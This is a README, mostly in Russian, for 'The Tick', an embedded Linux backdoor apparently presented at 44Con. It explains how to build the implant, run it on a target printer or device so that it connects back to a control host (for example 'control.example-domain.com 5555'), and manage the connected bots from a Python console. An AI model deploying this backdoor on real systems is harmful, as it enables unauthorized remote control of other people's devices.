
A simple embedded Linux backdoor.
Простой бэкдор для встраиваемых Linux-систем.

The Tick зависит только от libcurl, поэтому убедитесь, что у вас установлен соответствующий пакет для разработки. Например, в дистрибутивах на основе Debian это делается так:
sudo apt-get install libcurl-dev
После установки зависимостей просто запустите makefile:
cd src
make clean
make
После завершения выполнения команды "make" скомпилированный бинарный файл можно найти в папке "bin". Именно этот бинарный файл нужно запустить на целевой машине, чтобы управлять ею удалённо.
При кросс-компиляции для поддерживаемых платформ разрешение зависимостей и компиляция выполняются автоматически. В настоящее время единственная поддерживаемая платформа для кросс-компиляции — принтер Lexmark CX310DN, но в будущем будут добавлены другие устройства. Подробности смотрите в makefile.
Консоль управления написана на Python и поэтому не требует компиляции.
Обеспечение закрепления бэкдора сильно зависит от целевой платформы и поэтому здесь не описывается.
На целевой машине запустите бинарный файл бэкдора со следующими аргументами:
./ticksvc ADDR PORT
Замените "ADDR" и "PORT" на IP-адрес и порт, которые будет прослушивать консоль управления. Порт по умолчанию — 5555.
Консоль управления не требует установки, но у неё могут быть нерешённые зависимости. Выполните следующую команду, чтобы убедиться, что все зависимости установлены надлежащим образом (обратите внимание: sudo не требуется):
pip install --upgrade -r requirements.txt
В большинстве графических окружений Linux следующий файл "Tick.desktop" создаст значок, по двойному щелчку на котором запускается консоль:
[Desktop Entry]
Encoding=UTF-8
Value=1.0
Type=Application
Name=The Tick
GenericName=The Tick
Comment=An embedded Linux backdoor
Icon=/opt/thetick/doc/logo.png
Exec=/opt/thetick/tick.py
Terminal=true
Path=/opt/thetick/
Точное расположение файла Tick.desktop может различаться в зависимости от дистрибутива Linux, но обычно достаточно поместить его на рабочий стол. Обязательно отредактируйте путь, указав каталог, куда вы скачали The Tick (в примере выше — /opt/thetick).
Чтобы запустить бинарный файл бэкдора на целевой платформе, укажите имя хоста и порт управляющего сервера в качестве параметров командной строки. Например:
./ticksvc control.example-domain.com 5555
На управляющем сервере консоль, возможно, стоит запустить внутри GNU screen или аналогичной утилиты:
sudo apt-get install screen
screen -S thetick ./thetick.py
Таким образом вы сможете отключиться от консоли, нажав Control+A, а затем D. Вернуться к консоли позже можно так:
screen -r thetick
Консоль сообщит вам, когда к ней подключится новый бот. Команда "bots" показывает список подключённых ботов, а команда "use" выбирает бота для работы. Команда "help" выводит руководство пользователя.
Вот несколько скриншотов, иллюстрирующих возможности консоли:


The Tick упоминался в следующем докладе на 44Con (авторы — Daniel Romero и Mario Rivas):